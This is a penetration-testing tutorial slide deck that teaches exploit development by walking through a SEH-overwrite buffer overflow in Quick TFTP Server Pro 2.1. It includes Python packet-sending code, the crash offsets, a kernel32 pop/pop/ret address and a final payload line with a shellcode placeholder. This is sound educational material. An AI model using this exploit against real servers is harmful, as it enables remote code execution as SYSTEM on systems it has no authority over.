Custom Penetration Testing
Compromising a Vulnerability through Discovery and Custom Exploitation
Stephen Sims
Objectives
• Penetration Testing
• Precompiled Tools
• Targeting
• TFTP
– Testing a TFTP Server for Bugs – Discovering the Bug
– Exploiting the TFTP Server
• Advanced Concepts
What is Penetration Testing?
• Process of testing a target environment for weaknesses
– More thorough than vulnerability scanning alone
– Validates findings by exploiting flaws
– Allows you to think like an attacker
– Various levels of interaction/depth
Types of Penetration Testing
• Black-Box Penetration Testing
– No access to source code
– No access provided to OS, architecture, etc…
– More like an outsider attack scenario
• More time consuming
• Crystal-Box Penetration Testing
– Tester given source code, system & network architecture and/or privileged system access
– More thorough than black-box testing
– Cost effective
Precompiled Tools
• Pros
– Can quickly be used – Customer support
– Broad user community
– Often allow custom scripts or modules
• Cons
– Limited in scope
– Only discover and test known vulnerabilities
– Skilled attackers are not relying solely on them
– Precompiled tools offer a sense of complacency
Targeting
• General Steps
1. Determine Target Application and Operating System
2. Obtain a Copy of the Application 3. Analyze RFC and Communications
Protocols
4. Discover and Record a Crash Condition 5. Analyze Crash Condition for Exploitation
Opportunities
1) Determine Target Application and Operating System
• What application/service are you analyzing?
– What OS’ is it available for?
• Which one(s) are you interested in?
– What services does the application start up?
• There may be several
• Scanning may help
• Analyze documentation and code if possible
– Are the services proprietary or standards-based?
2) Obtain a Copy of the Application
• Create a lab environment and install the application
– Use the OS you are targeting – Utilize Virtual Machines
• Create snapshots prior to installation
• Install monitoring tools
– Attempt to obtain the source code
• Code analysis is often more complex than behavioral
analysis, but valuable
3) Analyze RFC and Communications Protocols
• Is documentation available?
– Programmers should follow RFC’s
• Search RFC for potential options and fields that may contain opportunities to cause a fault
• Understand each aspect of the protocols used by the application and relative behavior
– Is architectural documentation
available?
4) Discover and Record a Crash Condition
• Are you properly monitoring?
– Sniffers to record packets sent to the application
• Wireshark/Tshark, tcpdump, etc…
• Packets can be recorded and replayed
– Debuggers to record application behavior while receiving/handling data
• OllyDbg, Immunity Debugger, WinDbg
– OS monitoring tools to monitor health
• ProcMon, RegMon, FileMon, RegShot, etc…
– The condition must be repeatable
5) Analyze Crash Condition for Exploitation Opportunities
• What is happening during the crash?
– Analyze the status of each register
• Are registers holding or pointing to strange values? e.g.
0x41414141 if inputting A’s
– Is the Return Pointer or SEH chain being overwritten?
• Analyze the stack segment and monitor ESP/EBP
– Are heap pointers being overwritten?
• Analyze dynamic memory allocations and behavior
– There’s way more to analyze, but this is a start!
Targeting (2)
• Our goal is to discover and exploit a Windows Program vulnerability!
• The techniques we’ll cover is applicable with any target or service
• We’re targeting a TFTP service
– Must understand how the protocol works – Developers should follow RFC’s
• We can leverage the RFC as well
– Could use fuzzing to automate bug
discovery
Our TFTP Target
• Quick TFTP Server Pro Version 2.1
– Vulnerable to a stack-based buffer overflow
• Can exploit by overwriting the Structured Exception Handling (SEH) chain
• Allows for DoS or code execution as System
– TFTP Server Published by TallSoft
– Vulnerability discovered in 2008 by Mati
Aharoni of Offensive Security
TFTP
• Trivial File Transfer Protocol (TFTP)
– Simple protocol for transferring files over a network
– Clear-text protocol using UDP port 69 – Used for transferring files by network
devices, VOIP phones and other
client-server programs
TFTP Behavior
• Connection request is combined with either a read or write request
• Blocks of data are sent in a fixed 512 byte size
– Each block must be acknowledged for error control
• A block less than 512 bytes indicates
the end of the stream
TFTP Behavior (2)
• The first two bytes of a TFTP header indicates the request type and format
– \x00\x01 indicates a read request – \x00\x02 indicates a write request – \x00\x03 indicates the data block – \x00\x04 is an acknowledgement – \x00\x05 indicates an error
– \x00\x06 is an optional acknowledgement
TFTP Behavior (3)
• Read and Write request format:
– \x00\x01 for read | \x00\x02 for write – File Name
– Null byte - \x00
– Mode – Binary, ASCII or Mail – Null byte - \x00
• Example
Request Type File Name Null Mode Null
Read \x00\x01 file1.txt 0 Octet 0
Hacking Quick TFTP Server
• Quick TFTP Server Version 2.1
– Install tftpserver_setup.exe onto a Windows XP Virtual Machine
– Use the TFTP information just covered to help with the investigation
– Attempt to crash the TFTP server while running in a debugger
– Create a custom script to start the testing – Validate findings
– Attempt code execution
Tools We Need
• Programming/Scripting Language
– Python, Perl, Ruby, C
• Debugger and Disassembler
– OllyDbg, Immunity Debugger, IDAPro
• Shellcode
– Metasploit, Milw0rm, Custom
• An open mind!
– Knowledge of OS controls, Opcodes, Tricks…
Python
• Object-oriented, High-level Programming Language
• Very Intuitive
• Very Modular
• No Manual Compilation
• Plays well with other languages – C, C++, Jython, IronPython (.NET)
• Good Debugging
Tool: OllyDbg
• Software Debugger for Windows
– Author: Oleh Yuschuk
• Shareware!
• Binary Code Analysis
• Register Contents, Procedures, API
Calls, Patching, memory searching and
more!
Hacking TFTP Hint #1
• Consider the format of TFTP requests for your script
– We covered the order a few slides ago
– Read & Write requests are often the easiest to attack as they have variable fields
• They start with \x00\x01 & \x00\x02
– The header format must be correct to trigger a valid response
– Command line scripting not always the best option
• You may want to write a script
Hacking TFTP Hint #2
• Where could a buffer overflow condition exist?
– Try the request type field, file name and/or the mode
– Don’t forget the nulls to terminate!
– Make sure you’re watching the right thread in OllyDbg
• Processes have multiple threads on Windows
Hacking TFTP Hint #3
• The easiest way is to use Python or Perl to open a socket and send your script
import socket import sys
target = ‘IP ADDRESS’ #Enter the right IP here port = 69 #Port for TFTP
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) cmd = "A"*10 #Enter the number of A's to send
data = "\x00\x01"+ cmd #Modify this line to format your packet
s.sendto(data, (target, port))
Quick TFTP Walk-Through
• Start Quick TFTP Server with Olly
• Ignore entry point messages
• Press F9 once loaded
• Click “OK” on the
demo pop-up
Quick TFTP Walk-Through (2)
• This may be possible via command line, but…
– We need a script!
– Don’t forget the formatting of TFTP read and write requests:
– The overflow is in the mode section!
Request Type File Name Null Mode Null
Read \x00\x01 file1.txt 0 Octet 0
Quick TFTP Walk-Through (3)
• Write a python script that connects to the TFTP server with 1000 A’s
• No Crash in Olly…
Quick TFTP Walk-Through (4)
1060 A’s
EIP is 41414141
Success!
Quick TFTP Walk-Through (5)
• What are we overwriting?
• Lets do some math to see where the overflow is occurring
We overwrote
the SEH Chain!
Quick TFTP Walk-Through (6)
• Subtracting 41 A’s should take us to the SEH handler
• Lets give it a try by setting:
cmd = "A"*1023+"\xde\xc0\xad\xde"
We control EIP at
1023 bytes!
Quick TFTP Walk-Through (7)
• We now need to find a valid pop/pop/ret instruction
– Use the findjmp tool and experiment – 0x77ec9cac is one I chose from
kernel32.dll for XP SP1
– Remember that you must compensate for SafeSEH if hacking XP SP2/SP3
– Also remember that not every pop/pop/ret
address will work. You gotta dig…
Quick TFTP Walk-Through (8)
• Finalizing our script…
cmd = "A"*1019+"\xeb\x06\x90\x90"+"\xac\x9c\xec\x77"+"\x90"*4+sc data = "\x00\x01" + "blah" + "\x00"+cmd+"\x00“
Our jmp and pointer…
Our NOP’s and shellcode…
Advanced Concepts
• Depending on the OS Version, a number of controls have been added
– SafeSEH
• Protects SEH pointers against overwrites – ASLR
• Randomizes locations of libraries and memory segments – DEP
• Prevents code execution on the stack and heap – Security Cookies
• Pushes unique values onto the stack and heap during allocations which are checked upon exit or free
• Every byte in memory is a potential full or partial
opcode
More Information
• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.nextgenss.com/papers/defeating-w2k3-stack- protection.pdf
• Preventing the Exploitation of SEH Overwrites by Skape “Matt Miller”
http://www.uninformed.org/?v=5&a=2&t=pdf
• SEH Overwrites Simplified v1.01 by Aelphaeis Mangaraehttp://www.milw0rm.com/papers/187
• Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass by Alexander Anisimov http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf
• Reliable Windows Heap Exploits by Matt Conover & Oded Horovitz
http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits
• Third Generation Exploitation by Halvar Flake www.blackhat.com/presentations/win-usa- 02/halvarflake-winsec02.ppt
• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.ngssoftware.com/papers/defeating-w2k3-stack- protection.pdf
• Heap Feng Shui in JavaScript” by Alexander Sotirov
http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07- sotirov-apr19.pdf
• Understanding Windows Shellcode by Skape http://www.hick.org/code/skape/papers/win32-